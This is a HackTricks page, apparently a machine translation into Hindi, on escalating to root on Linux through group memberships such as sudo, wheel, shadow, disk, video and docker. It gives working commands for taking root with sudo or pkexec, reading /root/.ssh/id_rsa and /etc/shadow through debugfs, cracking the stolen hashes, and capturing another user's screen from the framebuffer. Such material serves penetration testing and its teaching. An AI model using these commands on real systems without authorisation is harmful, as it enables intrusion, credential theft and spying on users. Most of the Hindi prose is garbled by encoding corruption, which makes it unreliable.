{% hint style="success" %}
Learn & practice AWS Hacking:
[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\
Learn & practice GCP Hacking: 
[**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte)
Support HackTricks
* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)!
* **Join the** ЁЯТм [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** ЁЯРж [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)**.**
* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
{% endhint %}
.png)
Use [**Trickest**](https://trickest.com/?utm_source=hacktricks&utm_medium=text&utm_campaign=ppc&utm_term=trickest&utm_content=command-injection) to easily build and **automate workflows** powered by the world's **most advanced** community tools.\
Get Access Today:
{% embed url="https://trickest.com/?utm_source=hacktricks&utm_medium=banner&utm_campaign=ppc&utm_content=command-injection" %}
# Sudo/Admin Groups
## **PE - Method 1**
**рдХрднреА-рдХрднреА**, **рдбрд┐рдлрд╝реЙрд▓реНрдЯ рд░реВрдк рд╕реЗ \(рдпрд╛ рдХреНрдпреЛрдВрдХрд┐ рдХреБрдЫ рд╕реЙрдлрд╝реНрдЯрд╡реЗрдпрд░ рдХреЛ рдЗрд╕рдХреА рдЖрд╡рд╢реНрдпрдХрддрд╛ рд╣реЛрддреА рд╣реИ\)** **/etc/sudoers** рдлрд╝рд╛рдЗрд▓ рдХреЗ рдЕрдВрджрд░ рдЖрдк рдЗрдирдореЗрдВ рд╕реЗ рдХреБрдЫ рдкрдВрдХреНрддрд┐рдпрд╛рдБ рдкрд╛ рд╕рдХрддреЗ рд╣реИрдВ:
```bash
# Allow members of group sudo to execute any command
%sudo ALL=(ALL:ALL) ALL
# Allow members of group admin to execute any command
%admin ALL=(ALL:ALL) ALL
```
рдпрд╣ рдорддрд▓рдм рд╣реИ рдХрд┐ **рдХреЛрдИ рднреА рдЙрдкрдпреЛрдЧрдХрд░реНрддрд╛ рдЬреЛ sudo рдпрд╛ admin рд╕рдореВрд╣ рдХрд╛ рд╕рджрд╕реНрдп рд╣реИ, рд╡рд╣ sudo рдХреЗ рд░реВрдк рдореЗрдВ рдХреБрдЫ рднреА рдирд┐рд╖реНрдкрд╛рджрд┐рдд рдХрд░ рд╕рдХрддрд╛ рд╣реИ**ред
рдпрджрд┐ рдРрд╕рд╛ рд╣реИ, рддреЛ **рд░реВрдЯ рдмрдирдиреЗ рдХреЗ рд▓рд┐рдП рдЖрдк рдмрд╕ рдирд┐рд╖реНрдкрд╛рджрд┐рдд рдХрд░ рд╕рдХрддреЗ рд╣реИрдВ**:
```text
sudo su
```
## PE - Method 2
рд╕рднреА suid рдмрд╛рдЗрдирд░реА рдЦреЛрдЬреЗрдВ рдФрд░ рдЬрд╛рдВрдЪреЗрдВ рдХрд┐ рдХреНрдпрд╛ рдмрд╛рдЗрдирд░реА **Pkexec** рд╣реИ:
```bash
find / -perm -4000 2>/dev/null
```
рдпрджрд┐ рдЖрдк рдкрд╛рддреЗ рд╣реИрдВ рдХрд┐ рдмрд╛рдЗрдирд░реА pkexec рдПрдХ SUID рдмрд╛рдЗрдирд░реА рд╣реИ рдФрд░ рдЖрдк sudo рдпрд╛ admin рдХреЗ рд╕рджрд╕реНрдп рд╣реИрдВ, рддреЛ рдЖрдк рд╕рдВрднрд╡рддрдГ pkexec рдХрд╛ рдЙрдкрдпреЛрдЧ рдХрд░рдХреЗ sudo рдХреЗ рд░реВрдк рдореЗрдВ рдмрд╛рдЗрдирд░реА рдирд┐рд╖реНрдкрд╛рджрд┐рдд рдХрд░ рд╕рдХрддреЗ рд╣реИрдВред рдЗрд╕рдХреА рд╕рд╛рдордЧреНрд░реА рдХреА рдЬрд╛рдВрдЪ рдХрд░реЗрдВ:
```bash
cat /etc/polkit-1/localauthority.conf.d/*
```
рд╡рд╣рд╛рдБ рдЖрдк рдкрд╛рдПрдВрдЧреЗ рдХрд┐ рдХреМрди рд╕реЗ рд╕рдореВрд╣ **pkexec** рдирд┐рд╖реНрдкрд╛рджрд┐рдд рдХрд░рдиреЗ рдХреА рдЕрдиреБрдорддрд┐ рд░рдЦрддреЗ рд╣реИрдВ рдФрд░ **рдбрд┐рдлрд╝реЙрд▓реНрдЯ рд░реВрдк рд╕реЗ** рдХреБрдЫ рд▓рд┐рдирдХреНрд╕ рдореЗрдВ **sudo рдпрд╛ admin** рдХреЗ рдХреБрдЫ рд╕рдореВрд╣ **рдкреНрд░рдХрдЯ** рд╣реЛ рд╕рдХрддреЗ рд╣реИрдВред
**рд░реВрдЯ рдмрдирдиреЗ рдХреЗ рд▓рд┐рдП рдЖрдк рдирд┐рд╖реНрдкрд╛рджрд┐рдд рдХрд░ рд╕рдХрддреЗ рд╣реИрдВ**:
```bash
pkexec "/bin/sh" #You will be prompted for your user password
```
рдпрджрд┐ рдЖрдк **pkexec** рдирд┐рд╖реНрдкрд╛рджрд┐рдд рдХрд░рдиреЗ рдХреА рдХреЛрд╢рд┐рд╢ рдХрд░рддреЗ рд╣реИрдВ рдФрд░ рдЖрдкрдХреЛ рдпрд╣ **рддреНрд░реБрдЯрд┐** рдорд┐рд▓рддреА рд╣реИ:
```bash
polkit-agent-helper-1: error response to PolicyKit daemon: GDBus.Error:org.freedesktop.PolicyKit1.Error.Failed: No session for cookie
==== AUTHENTICATION FAILED ===
Error executing command as another user: Not authorized
```
**рдпрд╣ рдЗрд╕рд▓рд┐рдП рдирд╣реАрдВ рд╣реИ рдХрд┐ рдЖрдкрдХреЗ рдкрд╛рд╕ рдЕрдиреБрдорддрд┐рдпрд╛рдБ рдирд╣реАрдВ рд╣реИрдВ рдмрд▓реНрдХрд┐ рдЗрд╕рд▓рд┐рдП рдХрд┐ рдЖрдк GUI рдХреЗ рдмрд┐рдирд╛ рдЬреБрдбрд╝реЗ рдирд╣реАрдВ рд╣реИрдВ**ред рдФрд░ рдЗрд╕ рд╕рдорд╕реНрдпрд╛ рдХрд╛ рдПрдХ рд╕рдорд╛рдзрд╛рди рдпрд╣рд╛рдБ рд╣реИ: [https://github.com/NixOS/nixpkgs/issues/18012\#issuecomment-335350903](https://github.com/NixOS/nixpkgs/issues/18012#issuecomment-335350903)ред рдЖрдкрдХреЛ **2 рдЕрд▓рдЧ ssh рд╕рддреНрд░** рдХреА рдЖрд╡рд╢реНрдпрдХрддрд╛ рд╣реИ:
{% code title="session1" %}
```bash
echo $$ #Step1: Get current PID
pkexec "/bin/bash" #Step 3, execute pkexec
#Step 5, if correctly authenticate, you will have a root session
```
{% endcode %}
{% code title="session2" %}
```bash
pkttyagent --process #Step 2, attach pkttyagent to session1
#Step 4, you will be asked in this session to authenticate to pkexec
```
{% endcode %}
# рд╡реНрд╣реАрд▓ рд╕рдореВрд╣
**рдХрднреА-рдХрднреА**, **рдбрд┐рдлрд╝реЙрд▓реНрдЯ рд░реВрдк рд╕реЗ** **/etc/sudoers** рдлрд╝рд╛рдЗрд▓ рдХреЗ рдЕрдВрджрд░ рдЖрдк рдпрд╣ рдкрдВрдХреНрддрд┐ рдкрд╛ рд╕рдХрддреЗ рд╣реИрдВ:
```text
%wheel ALL=(ALL:ALL) ALL
```
рдпрд╣ рдорддрд▓рдм рд╣реИ рдХрд┐ **рдХреЛрдИ рднреА рдЙрдкрдпреЛрдЧрдХрд░реНрддрд╛ рдЬреЛ рд╕рдореВрд╣ рд╡реНрд╣реАрд▓ рдХрд╛ рд╕рджрд╕реНрдп рд╣реИ, рд╡рд╣ sudo рдХреЗ рд░реВрдк рдореЗрдВ рдХреБрдЫ рднреА рдирд┐рд╖реНрдкрд╛рджрд┐рдд рдХрд░ рд╕рдХрддрд╛ рд╣реИ**ред
рдпрджрд┐ рдРрд╕рд╛ рд╣реИ, рддреЛ **рд░реВрдЯ рдмрдирдиреЗ рдХреЗ рд▓рд┐рдП рдЖрдк рдмрд╕ рдирд┐рд╖реНрдкрд╛рджрд┐рдд рдХрд░ рд╕рдХрддреЗ рд╣реИрдВ**:
```text
sudo su
```
# Shadow Group
**рд╢реИрдбреЛ** рд╕рдореВрд╣ рдХреЗ рдЙрдкрдпреЛрдЧрдХрд░реНрддрд╛ **/etc/shadow** рдлрд╝рд╛рдЗрд▓ рдХреЛ **рдкрдврд╝** рд╕рдХрддреЗ рд╣реИрдВ:
```text
-rw-r----- 1 root shadow 1824 Apr 26 19:10 /etc/shadow
```
So, read the file and try to **crack some hashes**.
# Disk Group
рдпрд╣ рд╡рд┐рд╢реЗрд╖рд╛рдзрд┐рдХрд╛рд░ рд▓рдЧрднрдЧ **рд░реВрдЯ рдПрдХреНрд╕реЗрд╕ рдХреЗ рдмрд░рд╛рдмрд░** рд╣реИ рдХреНрдпреЛрдВрдХрд┐ рдЖрдк рдорд╢реАрди рдХреЗ рдЕрдВрджрд░ рд╕рднреА рдбреЗрдЯрд╛ рддрдХ рдкрд╣реБрдБрдЪ рд╕рдХрддреЗ рд╣реИрдВред
Files:`/dev/sd[a-z][1-9]`
```text
debugfs /dev/sda1
debugfs: cd /root
debugfs: ls
debugfs: cat /root/.ssh/id_rsa
debugfs: cat /etc/shadow
```
рдзреНрдпрд╛рди рджреЗрдВ рдХрд┐ debugfs рдХрд╛ рдЙрдкрдпреЛрдЧ рдХрд░рдХреЗ рдЖрдк **рдлрд╛рдЗрд▓реЗрдВ рд▓рд┐рдЦ** рднреА рд╕рдХрддреЗ рд╣реИрдВред рдЙрджрд╛рд╣рд░рдг рдХреЗ рд▓рд┐рдП, `/tmp/asd1.txt` рдХреЛ `/tmp/asd2.txt` рдореЗрдВ рдХреЙрдкреА рдХрд░рдиреЗ рдХреЗ рд▓рд┐рдП рдЖрдк рдХрд░ рд╕рдХрддреЗ рд╣реИрдВ:
```bash
debugfs -w /dev/sda1
debugfs: dump /tmp/asd1.txt /tmp/asd2.txt
```
рд╣рд╛рд▓рд╛рдВрдХрд┐, рдпрджрд┐ рдЖрдк **рд░реВрдЯ рджреНрд╡рд╛рд░рд╛ рд╕реНрд╡рд╛рдорд┐рддреНрд╡ рд╡рд╛рд▓реЗ рдлрд╝рд╛рдЗрд▓реЗрдВ рд▓рд┐рдЦрдиреЗ** рдХреА рдХреЛрд╢рд┐рд╢ рдХрд░рддреЗ рд╣реИрдВ \(рдЬреИрд╕реЗ `/etc/shadow` рдпрд╛ `/etc/passwd`\) рддреЛ рдЖрдкрдХреЛ "**рдЕрдиреБрдорддрд┐ рдЕрд╕реНрд╡реАрдХреГрдд**" рддреНрд░реБрдЯрд┐ рдорд┐рд▓реЗрдЧреАред
# рд╡реАрдбрд┐рдпреЛ рд╕рдореВрд╣
рдХрдорд╛рдВрдб `w` рдХрд╛ рдЙрдкрдпреЛрдЧ рдХрд░рдХреЗ рдЖрдк **рдЬрд╛рди рд╕рдХрддреЗ рд╣реИрдВ рдХрд┐ рдХреМрди рд╕рд┐рд╕реНрдЯрдо рдкрд░ рд▓реЙрдЧ рдЗрди рд╣реИ** рдФрд░ рдпрд╣ рдирд┐рдореНрдирд▓рд┐рдЦрд┐рдд рдЖрдЙрдЯрдкреБрдЯ рджрд┐рдЦрд╛рдПрдЧрд╛:
```bash
USER TTY FROM LOGIN@ IDLE JCPU PCPU WHAT
yossi tty1 22:16 5:13m 0.05s 0.04s -bash
moshe pts/1 10.10.14.44 02:53 24:07 0.06s 0.06s /bin/bash
```
The **tty1** рдХрд╛ рдорддрд▓рдм рд╣реИ рдХрд┐ рдЙрдкрдпреЛрдЧрдХрд░реНрддрд╛ **yossi рд╢рд╛рд░реАрд░рд┐рдХ рд░реВрдк рд╕реЗ** рдорд╢реАрди рдкрд░ рдПрдХ рдЯрд░реНрдорд┐рдирд▓ рдореЗрдВ рд▓реЙрдЧ рдЗрди рд╣реИред
**video group** рдХреЛ рд╕реНрдХреНрд░реАрди рдЖрдЙрдЯрдкреБрдЯ рджреЗрдЦрдиреЗ рдХрд╛ рдЕрдзрд┐рдХрд╛рд░ рд╣реИред рдореВрд▓ рд░реВрдк рд╕реЗ рдЖрдк рд╕реНрдХреНрд░реАрди рдХреЛ рджреЗрдЦ рд╕рдХрддреЗ рд╣реИрдВред рдРрд╕рд╛ рдХрд░рдиреЗ рдХреЗ рд▓рд┐рдП, рдЖрдкрдХреЛ **рд╕реНрдХреНрд░реАрди рдкрд░ рд╡рд░реНрддрдорд╛рди рдЫрд╡рд┐ рдХреЛ** рдХрдЪреНрдЪреЗ рдбреЗрдЯрд╛ рдореЗрдВ рдкреНрд░рд╛рдкреНрдд рдХрд░рдирд╛ рд╣реЛрдЧрд╛ рдФрд░ рдпрд╣ рдЬрд╛рдирдирд╛ рд╣реЛрдЧрд╛ рдХрд┐ рд╕реНрдХреНрд░реАрди рдХрд┐рд╕ рд░рд┐рдЬрд╝реЙрд▓реНрдпреВрд╢рди рдХрд╛ рдЙрдкрдпреЛрдЧ рдХрд░ рд░рд╣реА рд╣реИред рд╕реНрдХреНрд░реАрди рдбреЗрдЯрд╛ рдХреЛ `/dev/fb0` рдореЗрдВ рд╕рд╣реЗрдЬрд╛ рдЬрд╛ рд╕рдХрддрд╛ рд╣реИ рдФрд░ рдЖрдк рдЗрд╕ рд╕реНрдХреНрд░реАрди рдХрд╛ рд░рд┐рдЬрд╝реЙрд▓реНрдпреВрд╢рди `/sys/class/graphics/fb0/virtual_size` рдкрд░ рдкрд╛ рд╕рдХрддреЗ рд╣реИрдВред
```bash
cat /dev/fb0 > /tmp/screen.raw
cat /sys/class/graphics/fb0/virtual_size
```
To **open** the **raw image** you can use **GIMP**, select the **`screen.raw`** file and select as file type **Raw image data**:
Then modify the Width and Height to the ones used on the screen and check different Image Types \(and select the one that shows better the screen\):
# Root Group
рдРрд╕рд╛ рд▓рдЧрддрд╛ рд╣реИ рдХрд┐ рдбрд┐рдлрд╝реЙрд▓реНрдЯ рд░реВрдк рд╕реЗ **рд░реВрдЯ рд╕рдореВрд╣ рдХреЗ рд╕рджрд╕реНрдп** рдХреБрдЫ **рд╕реЗрд╡рд╛** рдХреЙрдиреНрдлрд╝рд┐рдЧрд░реЗрд╢рди рдлрд╝рд╛рдЗрд▓реЛрдВ рдпрд╛ рдХреБрдЫ **рд▓рд╛рдЗрдмреНрд░реЗрд░реА** рдлрд╝рд╛рдЗрд▓реЛрдВ рдпрд╛ **рдЕрдиреНрдп рджрд┐рд▓рдЪрд╕реНрдк рдЪреАрдЬреЛрдВ** рдХреЛ **рд╕рдВрд╢реЛрдзрд┐рдд** рдХрд░рдиреЗ рддрдХ рдкрд╣реБрдБрдЪ рдкреНрд░рд╛рдкреНрдд рдХрд░ рд╕рдХрддреЗ рд╣реИрдВ рдЬреЛ рд╡рд┐рд╢реЗрд╖рд╛рдзрд┐рдХрд╛рд░ рдмрдврд╝рд╛рдиреЗ рдХреЗ рд▓рд┐рдП рдЙрдкрдпреЛрдЧ рдХреА рдЬрд╛ рд╕рдХрддреА рд╣реИрдВ...
**рдЬрд╛рдВрдЪреЗрдВ рдХрд┐ рд░реВрдЯ рд╕рджрд╕реНрдп рдХреМрди рд╕реА рдлрд╝рд╛рдЗрд▓реЗрдВ рд╕рдВрд╢реЛрдзрд┐рдд рдХрд░ рд╕рдХрддреЗ рд╣реИрдВ**:
```bash
find / -group root -perm -g=w 2>/dev/null
```
# Docker Group
рдЖрдк рд╣реЛрд╕реНрдЯ рдорд╢реАрди рдХреЗ рд░реВрдЯ рдлрд╛рдЗрд▓ рд╕рд┐рд╕реНрдЯрдо рдХреЛ рдПрдХ рдЗрдВрд╕реНрдЯреЗрдВрд╕ рдХреЗ рд╡реЙрд▓реНрдпреВрдо рдореЗрдВ рдорд╛рдЙрдВрдЯ рдХрд░ рд╕рдХрддреЗ рд╣реИрдВ, рдЗрд╕рд▓рд┐рдП рдЬрдм рдЗрдВрд╕реНрдЯреЗрдВрд╕ рд╢реБрд░реВ рд╣реЛрддрд╛ рд╣реИ, рддреЛ рдпрд╣ рддреБрд░рдВрдд рдЙрд╕ рд╡реЙрд▓реНрдпреВрдо рдореЗрдВ `chroot` рд▓реЛрдб рдХрд░рддрд╛ рд╣реИред рдпрд╣ рдкреНрд░рднрд╛рд╡реА рд░реВрдк рд╕реЗ рдЖрдкрдХреЛ рдорд╢реАрди рдкрд░ рд░реВрдЯ рджреЗрддрд╛ рд╣реИред
{% embed url="https://github.com/KrustyHack/docker-privilege-escalation" %}
{% embed url="https://fosterelli.co/privilege-escalation-via-docker.html" %}
# lxc/lxd Group
[lxc - Privilege Escalation](lxd-privilege-escalation.md)
[**Trickest**](https://trickest.com/?utm_source=hacktricks&utm_medium=text&utm_campaign=ppc&utm_term=trickest&utm_content=command-injection) рдХрд╛ рдЙрдкрдпреЛрдЧ рдХрд░реЗрдВ рддрд╛рдХрд┐ рдЖрдк рдЖрд╕рд╛рдиреА рд╕реЗ **рд╡рд░реНрдХрдлрд╝реНрд▓реЛ** рдмрдирд╛ рд╕рдХреЗрдВ рдФрд░ **рд╕реНрд╡рдЪрд╛рд▓рд┐рдд** рдХрд░ рд╕рдХреЗрдВ рдЬреЛ рджреБрдирд┐рдпрд╛ рдХреЗ **рд╕рдмрд╕реЗ рдЙрдиреНрдирдд** рд╕рд╛рдореБрджрд╛рдпрд┐рдХ рдЙрдкрдХрд░рдгреЛрдВ рджреНрд╡рд╛рд░рд╛ рд╕рдВрдЪрд╛рд▓рд┐рдд рд╣реИрдВред\
рдЖрдЬ рд╣реА рдПрдХреНрд╕реЗрд╕ рдкреНрд░рд╛рдкреНрдд рдХрд░реЗрдВ:
{% embed url="https://trickest.com/?utm_source=hacktricks&utm_medium=banner&utm_campaign=ppc&utm_content=command-injection" %}
{% hint style="success" %}
AWS рд╣реИрдХрд┐рдВрдЧ рд╕реАрдЦреЗрдВ рдФрд░ рдЕрднреНрдпрд╛рд╕ рдХрд░реЗрдВ:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\
GCP рд╣реИрдХрд┐рдВрдЧ рд╕реАрдЦреЗрдВ рдФрд░ рдЕрднреНрдпрд╛рд╕ рдХрд░реЗрдВ: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte)
HackTricks рдХрд╛ рд╕рдорд░реНрдерди рдХрд░реЗрдВ
* [**рд╕рджрд╕реНрдпрддрд╛ рдпреЛрдЬрдирд╛рдПрдБ**](https://github.com/sponsors/carlospolop) рджреЗрдЦреЗрдВ!
* **рдЬреБрдбрд╝реЗрдВ** ЁЯТм [**Discord рд╕рдореВрд╣**](https://discord.gg/hRep4RUj7f) рдпрд╛ [**telegram рд╕рдореВрд╣**](https://t.me/peass) рдпрд╛ **рд╣рдореЗрдВ** **Twitter** ЁЯРж [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)** рдкрд░ **рдлреЙрд▓реЛ** рдХрд░реЗрдВред**
* рд╣реИрдХрд┐рдВрдЧ рдЯреНрд░рд┐рдХреНрд╕ рд╕рд╛рдЭрд╛ рдХрд░реЗрдВ рдФрд░ [**HackTricks**](https://github.com/carlospolop/hacktricks) рдФрд░ [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) рдЧрд┐рдЯрд╣рдм рд░рд┐рдкреЛрдЬрд┐рдЯрд░реА рдореЗрдВ PR рд╕рдмрдорд┐рдЯ рдХрд░реЗрдВред
{% endhint %}